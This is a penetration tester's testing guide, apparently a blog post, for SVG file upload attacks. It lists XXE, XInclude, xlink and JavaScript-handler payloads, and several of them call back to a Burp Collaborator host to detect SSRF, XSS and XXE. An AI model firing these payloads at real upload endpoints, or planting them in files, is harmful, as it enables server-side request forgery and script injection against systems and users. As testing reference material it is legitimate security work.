File Upload Exploits

SVG

Beware that SVGs can be imported from many other formats!

Remember to include namespaces:

<svg width="255px" height="255px" xmlns="http://www.w3.org/2000/svg" xmlns:xi="http://www.w3.org/2001/XInclude"
  xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xhtml="http://www.w3.org/1999/xhtml"  version="1.1">
</svg>

Testing guide

Check for XXE

<!DOCTYPE svg [ <!ENTITY ext PUBLIC "http://burpcollaborator.net/"> ]>

<!DOCTYPE svg [
  <!ENTITY % init SYSTEM "data://text/plain;base64,aHR0cDovL2l4anBvYXo3YXZnZTVhN3g0ZmYxaTZ5anZhMTFwcS5idXJwY29sbGFib3JhdG9yLm5ldC8=">
%init; ]>

Check for XInclude attacks

<xi:include parse="text" href="htpp://burpcollaborator.net/"/>

Test wether the server will try to load xlinked hrefs:

<image href="http://burpcollaborator.net/" height="55" width="55"/>

If this works it might be of interest to check whether you could at least display some html:

<foreignObject x="20" y="20" width="160" height="160">
  <div xmlns="http://www.w3.org/1999/xhtml">
    Lorem ipsum dolor sit amet, consectetur adipiscing elit.
    Sed mollis mollis mi ut ultricies. Nullam magna ipsum,
    porta vel dui convallis, rutrum imperdiet eros. Aliquam
    erat volutpat.
  </div>
</foreignObject> -->

And other ways to display text:

<tref xlink:href="http://burpcollaborator.net/text.txt"/>

Test for javascript execution

<handler xmlns:ev="http://www.w3.org/2001/xml­-events" ev:event="load">
  var xhr = new XMLHttpRequest(); xhr.open("GET", "http://burpcollaborator.net/"); xhr.send();
</handler>

<circle cx="50" cy="50" r="45" fill="green" id="foo"
  onload="document.getElementById('foo').setAttribute('fill', 'blue');"/>

Attack surface

  • SSRF
  • XSS on the behalf of the server - might exist a better terminology for this
  • XXE

Resources

Blackhat old exploits for browsers
Fingerprinting libraries with blind SVG XLINK SSRF

Author face

Teodor-Paul Tonghioiu

Penetration Tester & Bug Hunter

[email protected] https://blog.pawlo.ro/about/